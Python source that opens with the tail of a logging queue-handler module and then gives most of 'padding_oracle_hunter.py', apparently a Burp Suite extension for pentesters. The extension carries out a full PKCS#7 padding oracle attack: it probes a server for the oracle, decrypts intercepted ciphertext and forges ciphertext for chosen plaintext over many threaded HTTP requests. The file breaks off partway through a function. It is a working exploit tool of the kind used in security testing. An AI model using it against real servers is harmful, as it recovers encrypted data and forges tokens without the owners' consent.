def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except Queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except Queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
padding_oracle_hunter.py | from burp import IBurpExtender, IContextMenuFactory, ITab, IExtensionStateListener, IContextMenuInvocation, IHttpRequestResponse
from javax.swing import (JScrollPane, JPanel, JTabbedPane, JTextField, JLabel, JTextArea, JButton, JEditorPane, JMenuItem, JComboBox, JCheckBox, JOptionPane, JProgressBar, GroupLayout)
from java.lang import Short
from java.awt import Color
from binascii import hexlify, unhexlify
import re
import threading
import Queue
import random
import base64
import time
from collections import Counter, namedtuple
class BurpExtender(IBurpExtender, IContextMenuFactory, ITab, IExtensionStateListener):
# *************************************** PKCS#7 ***************************************
# global variables
gReqResPKCS7 = IHttpRequestResponse
gSelectedParamNamePKCS7 = ""
gHttpRequestStringPKCS7 = ""
gHttpRequestRawStringPKCS7 = ""
gPayloadPKCS7=""
gPayloadFormatPKCS7=""
gSelectedPayloadPKCS7=None
gThreadStopPKCS7=False
gOpThreadPKCS7 = None
gIsPayloadUrlEncodedPKCS7 = False
gresDictPKCS7={}
gPlaintextPKCS7 = ""
gBlockSizePKCS7 = ""
gThreadPKCS7 = ""
gPadMsgPKCS7 = ""
gPadMsgSelPKCS7 = ""
def DisplayOutput_PKCS7(self, text):
self.__jTextAreaOutputPKCS7.append(text)
def Worker_PKCS7(self, payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, PadMsg, start_byte, end_byte, mode, q):
for byteValue in range(start_byte,end_byte):
# Exit the operation if stop button was clicked
if(self.gThreadStopPKCS7):
return
# modify the block according to the padding value
mod_block = current_block[0:blockLen-(numOfPad*2)] + hex(byteValue).rstrip("L").replace('0x','').rjust(2,'0') + mod_byte
if(mode=="test"):
payload = encrypted_payload.replace(current_block, mod_block)
# send the web refresh request to check for oracle
result = self.ServiceRequest_PKCS7(payload)
ResInfo = self._helpers.analyzeResponse(result)
response = result[ResInfo.getBodyOffset():]
self.gresDictPKCS7[payload] = unhexlify(hexlify(response))
else:
if(mode=="enc"):
# dummy block to be appended to the encrypted block so that length is the same as the original payload
dummyblock = self.GetDummyBlock_PKCS7(blockLen *((payloadLen//blockLen)-2))
# send the web request
result = self.ServiceRequest_PKCS7(dummyblock + mod_block + encrypted_payload)
elif(mode=="dec"):
# send the web request
result = self.ServiceRequest_PKCS7(encrypted_payload.replace(current_block,mod_block))
# if the message is an invalid padding message
if self.gPadMsgSelPKCS7=="Invalid":
if (hexlify(PadMsg.encode()) not in hexlify(result)):
decb4xor = byteValue ^ numOfPad
q.put(decb4xor)
return
# if the message is a valid padding message
else:
if (hexlify(PadMsg.encode()) in hexlify(result)):
decb4xor = byteValue ^ numOfPad
q.put(decb4xor)
return
# return if the correct padding is already found
if(not q.empty()):
return
def ServiceRequest_PKCS7(self, encrypted_string):
try:
# Convert the payload back to the original format from hex
payload = self.ConvertFromHexToPayloadFormat(encrypted_string, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
if payload != None:
# Replace the #PAYLOAD# with the actual payload
newHttpRequest = self.gHttpRequestStringPKCS7.replace("#PAYLOAD#", payload)
# Update the http parameters
reqInfo = self._helpers.analyzeRequest(newHttpRequest)
headers = reqInfo.getHeaders()
param = newHttpRequest[reqInfo.getBodyOffset():]
newHttpRequest = self._helpers.buildHttpMessage(headers, param)
# Send the request
httpService = self.gReqResPKCS7.getHttpService()
res = self._callbacks.makeHttpRequest(self._helpers.buildHttpService(httpService.getHost(),httpService.getPort(), httpService.getProtocol() == "https"), newHttpRequest)
return res.getResponse()
except Exception as e:
return ""
def GetDummyBlock_PKCS7(self, length):
HexChar=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
DummyBlock=""
for i in range(0,length):
DummyBlock = DummyBlock + HexChar[random.randint(0,15)]
return DummyBlock
def Test_PKCS7(self, encrypted_string):
# initialize the variables
blockLen = int(self.gBlockSizePKCS7)*2
payloadLen = len(encrypted_string)
nbOfBlock = payloadLen//blockLen
dummyblock = self.GetDummyBlock_PKCS7(blockLen*(nbOfBlock-1))
encrypted_payload = dummyblock + encrypted_string[-blockLen:]
current_block = encrypted_payload[-(blockLen*2):][0:blockLen]
self.gresDictPKCS7 = {}
# limit the number of thread to 256
numberOfThread = int(self.gThreadPKCS7)
if(numberOfThread>=256):
numberOfThread = 256
# check byte from 0 - 255 to find the correct padding value
threads = list()
byte_range = 256//numberOfThread
byte_remain = 256%numberOfThread
# create and execute the threads
for k in range(0,numberOfThread):
start_byte_range = k * byte_range
end_byte_range = (k+1) * byte_range
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, "", 1, "", start_byte_range, end_byte_range, "test", None))
threads.append(x)
x.start()
# left over thread if there is any
if(byte_remain != 0):
start_byte_range = (k+1) * byte_range
end_byte_range = ((k+1) * byte_range) + byte_remain
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, "", 1, "", start_byte_range, end_byte_range, "test", None))
threads.append(x)
x.start()
# wait until all threads are complete
for x in threads:
x.join()
# Exit the operation if stop button was clicked
if self.gThreadStopPKCS7:
return
# check the padding responses
resCount = Counter(self.gresDictPKCS7.values())
if len(resCount)==2:
validPadRes = ""
invalidPadRes = ""
for response in resCount:
# if there is 1 unique response, it is likely the valid padding response
if(resCount[response]==1):
validPadRes = response
# there should be 255 same reponses for invalid padding
elif(resCount[response]==255):
invalidPadRes = response
# check and print the result
if(validPadRes!="" and invalidPadRes!=""):
self.__jTextAreaOutputPKCS7.setForeground(Color(255, 0, 0))
key_list = list(self.gresDictPKCS7.keys())
val_list = list(self.gresDictPKCS7.values())
# Retrive the payload for invalid padding
invalidpad_payload = key_list[val_list.index(invalidPadRes)]
invalidpad_payload = self.ConvertFromHexToPayloadFormat(invalidpad_payload, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
# Retrive the payload for valid padding
validpad_payload = key_list[val_list.index(validPadRes)]
validpad_payload = self.ConvertFromHexToPayloadFormat(validpad_payload, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
# Display the invalid padding response
self.DisplayOutput_PKCS7("**** Invalid Padding: ****\n")
self.DisplayOutput_PKCS7("Payload:\n{}\n".format(invalidpad_payload))
self.DisplayOutput_PKCS7("Response:\n{}\n\n".format(invalidPadRes))
# Display the valid padding response
self.DisplayOutput_PKCS7("**** Valid Padding: ****\n")
self.DisplayOutput_PKCS7("Payload:\n{}\n".format(validpad_payload))
self.DisplayOutput_PKCS7("Response:\n{}\n\n".format(validPadRes))
# Display the conclusion
self.DisplayOutput_PKCS7("The server is likely vulnerable to padding oracle attack\n")
else:
# Display the conclusion
self.DisplayOutput_PKCS7("The server is not vulnerable to padding oracle attack\n")
else:
# Display the conclusion
self.DisplayOutput_PKCS7("The server is not vulnerable to padding oracle attack\n")
# set progress bar to complete
self.__jProgressBarPKCS7.setValue(100)
self.__jProgressBarPKCS7.setString("Done")
def Encryption_PKCS7(self):
# initialize the variables
blockLen = int(self.gBlockSizePKCS7) *2
plaintextblock = []
ciphertext=""
self.DisplayOutput_PKCS7("Encrypting plaintext: {}\n".format(self.gPlaintextPKCS7))
# limit the number of thread to 256
numberOfThread = int(self.gThreadPKCS7)
if(numberOfThread>=256):
numberOfThread = 256
# calculate and compute the padding
padding_len = (len(self.gPlaintextPKCS7)//2)%int(self.gBlockSizePKCS7)
if(padding_len==0):
padding_len=int(self.gBlockSizePKCS7)
else:
padding_len = int(self.gBlockSizePKCS7) - padding_len
padding = (hex(padding_len).rstrip("L").replace('0x','').rjust(2,'0'))*padding_len
msg_hex = self.gPlaintextPKCS7 + padding
payloadLen = len(msg_hex)
# store the plaintext as blocks
for index in range(len(msg_hex),0,-blockLen):
plaintextblock.append(msg_hex[index-blockLen:index])
# set last encrypted block with random bytes
last_encrypted_payload = self.GetDummyBlock_PKCS7(blockLen)
encrypted_payload = last_encrypted_payload
# store the last blocks as ciphertext
ciphertext = last_encrypted_payload
# Start computing the ciphertext
self.DisplayOutput_PKCS7('Computing Padding Oracle Encryption..\n')
self.DisplayOutput_PKCS7("Computed Blocks in Hexadecimal:\n")
self.DisplayOutput_PKCS7("block 1: {}\n".format(encrypted_payload))
for i in range(0,len(plaintextblock)):
decb4xorstring=""
mod_byte=""
current_block = self.GetDummyBlock_PKCS7(blockLen)
# number of byte for padding
for numOfPad in range(1,int(self.gBlockSizePKCS7)+1):
if(decb4xorstring!=""):
tmp_byte = (hex(numOfPad).rstrip("L").replace('0x','').rjust(2,'0'))*(numOfPad-1)
mod_byte = hex(int(tmp_byte,16) ^ int(decb4xorstring,16)).rstrip("L").replace('0x','').rjust((numOfPad-1)*2,'0')
# check byte from 0 - 255 to find the correct padding value
threads = list()
byte_range = 256//numberOfThread
byte_remain = 256%numberOfThread
q = Queue.Queue()
# create and execute the threads
for k in range(0,numberOfThread):
start_byte_range = k * byte_range
end_byte_range = (k+1) * byte_range
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "enc", q))
threads.append(x)
x.start()
# left over thread if there is any
if(byte_remain != 0):
start_byte_range = (k+1) * byte_range
end_byte_range = ((k+1) * byte_range) + byte_remain
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "enc", q))
threads.append(x)
x.start()
# wait until all threads complete
for x in threads:
x.join()
# Exit the operation if stop button was clicked
if self.gThreadStopPKCS7:
return
# if the valid padding is found
if(not q.empty()):
decb4xor = q.get()
q.task_done()
decb4xorstring = hex(decb4xor).rstrip("L").replace('0x','').rjust(2,'0') + decb4xorstring
index = blockLen-(numOfPad*2)
ciphertext = hex(decb4xor ^ int(plaintextblock[i][index:index+2],16)).rstrip("L").replace('0x','').rjust(2,'0') + ciphertext
else:
self.DisplayOutput_PKCS7("\nUnable to find valid padding!\n")
return
# assigned the current recovered ciphertext to encrypted payload
encrypted_payload = ciphertext[0:blockLen]
self.DisplayOutput_PKCS7("block {}: {}\n".format(i+2,encrypted_payload))
# update the progress bar
progress = int((i+1)/float(len(plaintextblock))*100)
self.__jProgressBarPKCS7.setValue(progress)
# return the encrypted payload into the desired format
ciphertext = self.ConvertFromHexToPayloadFormat(ciphertext, self.gPayloadFormatPKCS7, self.gIsPayloadUrlEncodedPKCS7)
if(ciphertext!=None):
# set progress bar to complete
self.__jProgressBarPKCS7.setString("Done")
# output the encrypted payload
self.DisplayOutput_PKCS7("\nencrypted payload:\n")
self.DisplayOutput_PKCS7("{}\n".format(ciphertext))
def Decryption_PKCS7(self, encrypted_string):
# initialize the variables
blockLen = int(self.gBlockSizePKCS7)*2
plaintext=""
blocktext=""
payloadLen = len(encrypted_string)
nbOfBlock = payloadLen//blockLen
dummyblock = self.GetDummyBlock_PKCS7(blockLen*(nbOfBlock-1))
# iv = encrypted_string[0:blockLen]
blockCounter=1
self.DisplayOutput_PKCS7("Decrypting ciphertext: {}\n".format(self.gSelectedPayloadPKCS7))
# limit the number of thread to 256
numberOfThread = int(self.gThreadPKCS7)
if(numberOfThread>=256):
numberOfThread = 256
# Start decryption
self.DisplayOutput_PKCS7("Computing Padding Oracle Decryption......\n")
self.DisplayOutput_PKCS7("Recovered Blocks in Hexadecimal:\n")
# Split the block (value of n-1 block is required to recover n block)
for block in range(nbOfBlock-2,-1,-1):
decb4xorstring=""
mod_byte=""
# number of byte for padding
for numOfPad in range(1,int(self.gBlockSizePKCS7)+1):
# Extract the current encrypted byte to be recovered
currentByte = encrypted_string[-(blockCounter*blockLen)-(numOfPad*2):][0:2]
# Prepare the payload
encrypted_payload = dummyblock + encrypted_string[(-blockCounter*blockLen):][0:blockLen]
# Extract the current working block
current_block = encrypted_payload[(-blockLen*2):][0:blockLen]
if(decb4xorstring!=""):
tmp_byte = (hex(numOfPad).rstrip("L").replace('0x','').rjust(2,'0'))*(numOfPad-1)
mod_byte = hex(int(tmp_byte,16) ^ int(decb4xorstring,16)).rstrip("L").replace('0x','').rjust((numOfPad-1)*2,'0')
# check byte from 0 - 255 to find the correct padding value
threads = list()
byte_range = 256//numberOfThread
byte_remain = 256%numberOfThread
q = Queue.Queue()
# create and execute the threads
for k in range(0,numberOfThread):
start_byte_range = k * byte_range
end_byte_range = (k+1) * byte_range
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "dec", q))
threads.append(x)
x.start()
# left over thread if there is any
if(byte_remain != 0):
start_byte_range = (k+1) * byte_range
end_byte_range = ((k+1) * byte_range) + byte_remain
x = threading.Thread(target=self.Worker_PKCS7, args=(payloadLen, blockLen, current_block, encrypted_payload, mod_byte, numOfPad, self.gPadMsgPKCS7, start_byte_range, end_byte_range, "dec", q))
threads.append(x)
x.start()
# wait until all threads complete
for x in threads:
x.join()
# Exit the operation if stop button was clicked
if self.gThreadStopPKCS7:
return
# if the valid padding is found
if(not q.empty()):
decb4xor = q.get()
q.task_done()
decb4xorstring = hex(decb4xor).rstrip("L").replace('0x','').rjust(2,'0') + decb4xorstring
index = blockLen-(numOfPad*2)
blocktext = hex(decb4xor ^ int(currentByte,16)).rstrip("L").replace('0x','').rjust(2,'0') + blocktext
else:
self.DisplayOutput_PKCS7("\nUnable to find correct padding!\n")
return
plaintext = blocktext + plaintext
self.DisplayOutput_PKCS7("block {}: {}\n".format(blockCounter,blocktext))
blocktext=""
# update the progress bar
progress = int((blockCounter/float(nbOfBlock-1))*100)
self.__jProgressBarPKCS7.setValue(progress)
blockCounter = blockCounter+1
# set progress bar to complete
self.__jProgressBarPKCS7.setString("Done")
# output the plaintext
self.DisplayOutput_PKCS7("\nDecrypted plaintext:\n")
self.DisplayOutput_PKCS7("Hex: {}\n".format(plaintext))
self.DisplayOutput_PKCS7("Bytes: {}\n".format(unhexlify(plaintext)))
def InputValidation_PKCS7(self, mode):
try:
# Set default font display to black
self.__jTextAreaOutputPKCS7.setForeground(Color(0, 0, 0))
# make sure all the previous thread was terminated
if self.gOpThreadPKCS7!=None and self.gOpThreadPKCS7.isAlive():
JOptionPane.showMessageDialog(self._jPaddingOracleTab,"Previous thread is still running! Please click the stop button to terminate it", "Warning", JOptionPane.WARNING_MESSAGE)
return False
# reset the variables
self.gThreadStopPKCS7 = False
self.__jTextAreaOutputPKCS7.setText("")
self.__jProgressBarPKCS7.setValue(0)
self.__jProgressBarPKCS7.setString("")
self.__jProgressBarPKCS7.setStringPainted(True)
# check if the payload is selected
if self.gSelectedPayloadPKCS7==None:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Incorrect payload selection!", "Error", JOptionPane.ERROR_MESSAGE)
return False
# Get plaintext for encryption operation
if mode=="encrypt":
plaintext_string = re.sub('\W+','', self.__textPlaintextPKCS7.getText())
if plaintext_string=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide the plaintext in hexadecimal!", "Error", JOptionPane.ERROR_MESSAGE)
return False
# check whether the plaintext is hexadecimal value
unhexlify(plaintext_string.encode())
self.gPlaintextPKCS7 = plaintext_string
# Get block size
blocksize = re.sub('\W+','', self.__textBlockSizePKCS7.getText())
if blocksize=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide a valid block size in byte!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gBlockSizePKCS7 = blocksize
# Get number of thread
thread = re.sub('\W+','',self.__textThreadPKCS7.getText())
if thread=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide a valid thread number!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gThreadPKCS7 = thread
# Only used in the encryption or decryption operations
if mode!="test":
# Get valid or invalid padding message
self.gPadMsgSelPKCS7 = self.__jComboBoxPadMsgPKCS7.getSelectedItem()
PadMsg = self.__textPadMessagePKCS7.getText()
if PadMsg=="":
JOptionPane.showMessageDialog(self._jPaddingOracleTab, "Please provide part or full of the valid or invalid padding response!", "Error", JOptionPane.ERROR_MESSAGE)
return False
self.gPadMsgPKCS7 = PadMsg
return True
except Exception as e:
JOptionPane.showMessageDialog(self._jPaddingOracleTab, e, "Exception", JOptionPane.ERROR_MESSAGE)
return False
def setGUI_PKCS7(self):
self.__jPanelPKCS7 = JPanel()
jPanelLayoutPKCS7 = GroupLayout(self.__jPanelPKCS7)
self.__jPanelPKCS7.setLayout(jPanelLayoutPKCS7)
jPanelLayoutPKCS7.setAutoCreateGaps(True)
jPanelLayoutPKCS7.setAutoCreateContainerGaps(True)
self.__jLabelReqPKCS7 = JLabel("Request")
self.__jScrollPaneReqPKCS7 = JScrollPane()
self.__jEditorPaneReqPKCS7 = JEditorPane()
self.__jEditorPaneReqPKCS7.setEditable(False)
self.__jScrollPaneReqPKCS7.setViewportView(self.__jEditorPaneReqPKCS7)
self.__jLabelThreadPKCS7 = JLabel("Thread:")
self.__textThreadPKCS7 = JTextField("1")
self.__textThreadPKCS7.setToolTipText("number of thread")
self.__jLabelBlockSizePKCS7 = JLabel("Block Size:")
self.__textBlockSizePKCS7 = JTextField("16")
self.__textBlockSizePKCS7.setToolTipText("block size (byte)")
self.__jLabelPadMessagePKCS7 = JLabel("Padding Response:")
self.__textPadMessagePKCS7 = JTextField()
self.__textPadMessagePKCS7.setToolTipText("part or full of the valid or invalid padding response, only used in the encryption and decryption operations")
self.__jComboBoxPadMsgPKCS7 = JComboBox(['Invalid', 'Valid'])
self.__jComboBoxPadMsgPKCS7.setSelectedIndex(0)
self.__jButtonClearPayloadPKCS7 = JButton("Clear Selection",actionPerformed=self.clearPayload_PKCS7)
self.__jButtonSelPayloadPKCS7 = JButton("Select Payload",actionPerformed=self.selectPayload_PKCS7)
self.__jLabelFormatPKCS7 = JLabel("Format:")
self.__jComboBoxFormatPKCS7 = JComboBox(['Hex', 'Base64', 'Decimal'])
self.__jComboBoxFormatPKCS7.setSelectedIndex(0)
self.__jCheckBoxUrlEncodedPKCS7=JCheckBox("Url Encoded")
self.__jButtonTestPKCS7 = JButton("Test", actionPerformed=self.testPayload_PKCS7)
self.__jButtonEncPKCS7 = JButton("Encrypt", actionPerformed=self.encryptPayload_PKCS7)
self.__jButtonDecPKCS7 = JButton("Decrypt", actionPerformed=self.decryptPayload_PKCS7)
self.__jButtonStopPKCS7 = JButton("Stop", actionPerformed=self.stopOperation_PKCS7)
self.__jLabelOutPKCS7 = JLabel("Output")
self.__jTextAreaOutputPKCS7 = JTextArea()
self.__jTextAreaOutputPKCS7.setEditable(False)
self.__jTextAreaOutputPKCS7.setColumns(20)
self.__jTextAreaOutputPKCS7.setRows(5)
self.__jScrollPaneOutPKCS7 = JScrollPane()
self.__jScrollPaneOutPKCS7.setViewportView(self.__jTextAreaOutputPKCS7)
self.__jLabelPlaintextPKCS7 = JLabel("Plaintext:")
self.__textPlaintextPKCS7 = JTextField()
self.__textPlaintextPKCS7.setToolTipText("plaintext in hexadecimal, only use in the encryption operation")
self.__jProgressBarPKCS7 = JProgressBar()
jPanelLayoutPKCS7.setHorizontalGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelReqPKCS7)
.addComponent(self.__jScrollPaneReqPKCS7, GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addGap(300, 300, 300)
.addComponent(self.__jButtonSelPayloadPKCS7)
.addGap(20, 20, 20)
.addComponent(self.__jLabelFormatPKCS7)
.addComponent(self.__jComboBoxFormatPKCS7,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addGap(20, 20, 20)
.addComponent(self.__jCheckBoxUrlEncodedPKCS7)
.addGap(20, 20, 20)
.addComponent(self.__jButtonClearPayloadPKCS7))
.addGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelThreadPKCS7)
.addComponent(self.__jLabelBlockSizePKCS7)
.addComponent(self.__jLabelPadMessagePKCS7)
.addComponent(self.__jLabelPlaintextPKCS7))
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__textThreadPKCS7, GroupLayout.PREFERRED_SIZE, 112, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textBlockSizePKCS7, GroupLayout.PREFERRED_SIZE, 112, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPadMessagePKCS7, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__textPlaintextPKCS7, GroupLayout.PREFERRED_SIZE, 870, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jComboBoxPadMsgPKCS7,GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addComponent(self.__jLabelOutPKCS7)
.addComponent(self.__jScrollPaneOutPKCS7,GroupLayout.PREFERRED_SIZE, 0, 1080)
.addGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addGap(165, 165, 165)
.addComponent(self.__jButtonTestPKCS7)
.addGap(165, 165, 165)
.addComponent(self.__jButtonEncPKCS7)
.addGap(165, 165, 165)
.addComponent(self.__jButtonDecPKCS7)
.addGap(165, 165, 165)
.addComponent(self.__jButtonStopPKCS7))
.addComponent(self.__jProgressBarPKCS7, GroupLayout.PREFERRED_SIZE, 1080, GroupLayout.PREFERRED_SIZE)
)
jPanelLayoutPKCS7.setVerticalGroup(
jPanelLayoutPKCS7.createSequentialGroup()
.addComponent(self.__jLabelReqPKCS7)
.addComponent(self.__jScrollPaneReqPKCS7, GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(15, 15, 15)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jButtonSelPayloadPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jLabelFormatPKCS7)
.addComponent(self.__jComboBoxFormatPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jCheckBoxUrlEncodedPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonClearPayloadPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelThreadPKCS7)
.addComponent(self.__textThreadPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelBlockSizePKCS7)
.addComponent(self.__textBlockSizePKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelPadMessagePKCS7)
.addComponent(self.__textPadMessagePKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jComboBoxPadMsgPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jLabelPlaintextPKCS7)
.addComponent(self.__textPlaintextPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE))
.addGap(20, 20, 20)
.addComponent(self.__jLabelOutPKCS7)
.addComponent(self.__jScrollPaneOutPKCS7,GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
.addGap(20, 20, 20)
.addGroup(
jPanelLayoutPKCS7.createParallelGroup()
.addComponent(self.__jButtonTestPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonEncPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonDecPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE)
.addComponent(self.__jButtonStopPKCS7, GroupLayout.PREFERRED_SIZE, 40, GroupLayout.PREFERRED_SIZE))
.addGap(50, 50, 50)
.addComponent(self.__jProgressBarPKCS7, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addGap(20, 20, 20)
)
def stopOperation_PKCS7(self, button):
self.DisplayOutput_PKCS7("Operation halted!\n")
self.gThreadStopPKCS7 = True
self.__jProgressBarPKCS7.setValue(0)
self.__jProgressBarPKCS7.setString("")
def testPayload_PKCS7(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS7("test")
if(initStatus):
# Start the Test thread
self.__jProgressBarPKCS7.setString("Testing...")
encrypted_string = self.gPayloadPKCS7
self.gOpThreadPKCS7 = threading.Thread(target=self.Test_PKCS7, args=(encrypted_string,))
self.gOpThreadPKCS7.start()
def encryptPayload_PKCS7(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS7("encrypt")
if(initStatus):
# Start the Encryption Thread
self.__jProgressBarPKCS7.setString("Encrypting...")
self.gOpThreadPKCS7 = threading.Thread(target=self.Encryption_PKCS7)
self.gOpThreadPKCS7.start()
def decryptPayload_PKCS7(self, button):
# Perform input validation
initStatus = self.InputValidation_PKCS7("decrypt")
if(initStatus):
# Start the Decryption Thread
self.__jProgressBarPKCS7.setString("Decrypting...")
encrypted_string = self.gPayloadPKCS7
self.gOpThreadPKCS7 = threading.Thread(target=self.Decryption_PKCS7, args=(encrypted_string,))
self.gOpThreadPKCS7.start()
def clearPayload_PKCS7(self, button):
if self.gHttpRequestRawStringPKCS7 !="":
self.__jEditorPaneReqPKCS7.setText(self.gHttpRequestRawStringPKCS7)
self.gSelectedPayloadPKCS7 = None
# Enabled the format dropdown box and url encode checkbox
self.__jComboBoxFormatPKCS7.setEnabled(True)
self.__jCheckBoxUrlEncodedPKCS7.setEnabled(True)
def selectPayload_PKCS7(self, button):
# Retrieve the selected the payload
payload = self.__jEditorPaneReqPKCS7.getSelectedText().replace("\n", "")
# Stored the selected the payload
self.gSelectedPayloadPKCS7 = payload
if(payload!=None):
# Check whether the payload is url encoded.
if self.__jCheckBoxUrlEncodedPKCS7.isSelected():
